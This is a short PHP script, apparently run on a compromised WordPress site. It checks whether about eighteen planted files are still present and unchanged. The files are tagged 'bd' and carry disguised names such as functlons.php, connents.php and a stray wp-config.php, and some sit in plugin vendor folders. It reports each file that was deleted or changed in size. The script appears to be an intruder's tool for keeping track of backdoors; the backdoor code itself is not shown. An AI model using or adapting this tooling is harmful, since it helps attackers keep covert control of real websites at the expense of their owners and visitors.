<?php   $r = '/home/triathlon/www'; $x = ["/wp-content/plugins/tablepress/libraries/vendor/PhpOffice/PhpSpreadsheet/Calculation/Financial/Securities/qanda.php"=>"bd@@37647@@1047",
"/wp-config.php"=>"bd@@709657@@4817",
"/wp-content/plugins/tablepress/libraries/vendor/PhpOffice/PhpSpreadsheet/Calculation/locale/hu/pclerror.lib.php"=>"bd@@40007@@215",
"/wp-content/plugins/elementor/core/app/modules/kit-library/connect/kit.library.php"=>"bd@@159882@@535",
"/4e496b.php"=>"bd@@67730@@105",
"/wp-content/plugins/tablepress/libraries/vendor/PhpOffice/PhpSpreadsheet/Calculation/locale/de/archive1.php"=>"bd@@38813@@385",
"/wp-content/plugins/tablepress/i18n/datatables/lang-nb_NO.php"=>"bd@@33961@@_COOKIE[3]",
"/wp-content/themes/error_404_1751125523/functlons.php"=>"bd@@432310@@727",
"/wp-content/plugins/tablepress/libraries/vendor/PhpOffice/PhpSpreadsheet/Calculation/locale/cs/gallery.lang_pt.php"=>"bd@@41155@@616",
"/wp-content/themes/archives-1748029084/wp-config.php"=>"bd@@266704@@727",
"/wp-content/plugins/tablepress/libraries/freemius/templates/forms/user-change.php"=>"bd@@191952@@Content-Security-Policy",
"/archives/old/wp-includes/js/tinymce/plugins/spellchecker/rpc.php"=>"bd@@191957@@Feature-Policy",
"/wp-content/plugins/tablepress/libraries/vendor/PhpOffice/PhpSpreadsheet/Calculation/locale/it/cookie.auth.lib.php"=>"bd@@152295@@376",
"/wp-content/plugins/tablepress/libraries/vendor/PhpOffice/PhpSpreadsheet/Calculation/locale/en/image_processor.php"=>"bd@@191976@@411",
"/wp-content/themes/page-template-1747415858/connents.php"=>"bd@@489@@1166",
"/wp-content/plugins/tablepress/libraries/vendor/PhpOffice/PhpSpreadsheet/Shared/Trend/lang_en.php"=>"bd@@191983@@534",
"/wp-content/plugins/tablepress/libraries/vendor/PhpOffice/PhpSpreadsheet/Collection/directories.php"=>"bd@@191989@@534",
"/wp-content/plugins/elementor/core/editor/loader/common/editor.common.scripts.settings.php"=>"bd@@191991@@1030"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 